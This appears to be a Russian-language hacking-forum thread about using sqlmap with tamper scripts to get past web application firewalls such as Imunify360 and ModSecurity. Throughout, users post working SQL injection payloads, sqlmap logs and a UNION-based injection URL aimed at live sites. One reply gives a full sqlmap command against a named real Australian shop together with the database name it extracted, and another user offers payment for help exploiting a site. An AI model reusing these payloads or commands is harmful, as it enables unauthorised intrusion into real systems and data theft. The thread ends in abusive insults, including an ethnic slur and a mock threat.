Вопросы по SQLMap

Доброго вечера, ребята. Актуальный вопрос, может есть готовый тампер под - Imunify360 (CloudLinux) waf, либо может взять что-то из готового и переписать?
Уж один сладкий вариант подвернулся))
Всех с наступающим Новым 2022 Годом.

 

Code:

Parameter: JSON #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (UPDATEXML)
    Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SEL
ECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}

    Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[D
ELIMITER_STOP]'),[RANDNUM1])
---
[12:20:48] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.34
back-end DBMS: MySQL >= 5.1
[12:20:48] [INFO] fetching database names
[12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT C
OUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'Bbs
S'='BbsS
[12:20:49] [WARNING] the SQL query provided does not return any output
[12:20:49] [INFO] falling back to current database
[12:20:49] [INFO] fetching current database
[12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DAT
ABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
[12:20:49] [DEBUG] performed 1 query in 0.65 seconds
[12:20:49] [CRITICAL] unable to retrieve the database names

 

Ребят помогите как запихнуть в sqlmap
есть бага site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
работает название бд выводит но sqlmap не видит что линк уязвим пробовал и темперы разные тупо 403 выводи в логе sqlmap
руками получается вывести version 10.2.43-MariaDB-cll-lve получается вывезти user

 

очень похоже на модсекьюрити, надо тампер либо искать либо перепилить готовые, тут тема обхода https://forum.antichat.com/threads/425295/

 

what MYSQL version ?

https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

 

version 10.2.43-MariaDB-cll-lve

 

Попробовал как у автора from {f information_schema.tables} блочит 403 выдает и все
просто '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ работает версия выводится
Пробовал в ручную как у автора тут
Тоже тупо блок может это не модсекьюрите?хотя конечно очень похоже

 

test versionedkeywords,between,unionalltounion tamper scripts together

 

[13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
[13:53:45] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times
К сожалению tamper не помог

 

send me your target link via pm

 

Spoiler: sqlmap payload

python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,space2comment,unionalltounion --fresh-queries

available databases [1]:
[*] mkeducat_books2019

 

deleted

 

Помогите раскрутить скулю.Готов оплатить.
мап выдает всю инфу кроме таблиц.При выводе таблиц ответ от сервера 404.

Code:

[19:10:09] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0
[19:10:09] [INFO] fetching database names
[19:10:09] [DEBUG] used SQL query returns 2 entries
[19:10:09] [INFO] starting 2 threads
[19:10:09] [INFO] resumed: 'information_schema'
[19:10:09] [INFO] resumed: 'a7ewww1ff'
[19:10:09] [DEBUG] performed 0 queries in 0.12 seconds
[19:10:09] [INFO] fetching tables for databases: 'a7ewww1ff, informat
ion_schema'
[19:10:09] [PAYLOAD] 1' AND (SELECT 7181 FROM(SELECT COUNT(*),CONCAT(0x71787a6b7
1,(SELECT HEX(IFNULL(CAST(COUNT(*) AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.TABL
ES WHERE table_schema IN (0x61376531666638365f7070757067726164653234,0x696e666f7
26d6174696f6e5f736368656d61)),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.PLUGINS GROUP BY x)a)-- VZaA
you provided a HTTP Cookie header value, while target URL provides its own cooki
es within HTTP Set-Cookie header which intersect with yours. Do you want to merg
e them in further requests? [Y/n] Y
[19:10:09] [DEBUG] used the default behavior, running in batch mode
[19:10:10] [DEBUG] declared web page charset 'utf-8'
[19:10:10] [DEBUG] page not found (404)
[19:10:10] [WARNING] the SQL query provided does not return any output
[19:10:10] [PAYLOAD] 1' AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x71787a6b7
1,(SELECT HEX(IFNULL(CAST(COUNT(*) AS NCHAR),0x20)) FROM mysql.innodb_table_stat
s WHERE database_name IN (0x61376531666638365f7070757067726164653234,0x696e666f7
26d6174696f6e5f736368656d61)),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.PLUGINS GROUP BY x)a)-- zeaQ
[19:10:10] [WARNING] the SQL query provided does not return any output
[19:10:10] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
[19:10:10] [DEBUG] used the default behavior, running in batch mode
No tables found
[19:10:10] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 2 times
[19:10:10] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
 kind of protection is involved (e.g. WAF)
[19:10:10] [WARNING] your sqlmap version is outdated

 

1. update your sqlmap
2. count() your DB, may be it is empty row
3. --no-cast, --hex, tamper scripts
4. --ignore-code=404
5. check it manually

 

Как правильно составить запрос в sqlmap чтобы отправить сообщение через smtp в ms server и можно ли это в других субд?
ПРИМЕР: https://habr.com/ru/post/179819/
Пробовал создать профиль --sql-query=EXECUTE msdb.dbo.sysmail_add_account_sp
Но получаю 'NULL'

 

Подскажите пожалуйста какой тампер использовать
--tamper=between,space2comment

[INFO] testing MySQL
[PAYLOAD] [email protected]'/**/RLIKE%09(SELECT%09(CASE%09WHEN%09(QUARTER(NULL%09XOR%09NULL%09)/**/IS%09NULL%09)/**/THEN%090x7465737440746573742e74657374/**/ELSE%090x28/**/END%09))/**/AND%09'ZlFN'/**/LIKE/**/'ZlFN
[INFO] confirming MySQL
[PAYLOAD] [email protected]'/**/RLIKE%09(SELECT%09(CASE%09WHEN%09(SESSION_USER()/**/LIKE%09USER())/**/THEN%090x7465737440746573742e74657374/**/ELSE%090x28/**/END%09))/**/AND%09'sSAo'/**/LIKE/**/'sSAo
[DEBUG] got HTTP error code: 403 ('Forbidden')
[email protected]'/**/RLIKE%09(SELECT%09(CASE%09WHEN%09(GEOGRAPHY_AREA(NULL%09)/**/IS%09NULL%09)/**/THEN%090x7465737440746573742e74657374/**/ELSE%090x28/**/END%09))/**/AND%09'bSFh'/**/LIKE/**/'bSFh
[DEBUG] got HTTP error code: 500 ('Internal Server Error')
[WARNING] the back-end DBMS is not MySQL
[CRITICAL] sqlmap was not able to fingerprint the back-end database management system

Есть несколько таких сайтов и если хостинг находится на server*.web-hosting.com не могу вывести имя баз

 

Мертвый форум (

 

абидна, больна такое читат. ну а вопрос твой, если что, аутистический) Хрен знает что у тебя там. Нормальные люди тестят руками ответы сервера, смотрят что не хочет сервер пропускать а потом принимают решение какой обход заюзать. Ну а ты высрал 10 строк в которых нифига не понятно и они несут просто ноль информации, ровно столько сколько грамм весит твой умище, кек. Иди трудись)

 

Слышь хуило, иди грамоте учись лучше хохляндия

 

Я тебя вычислю по ИП, смотри мне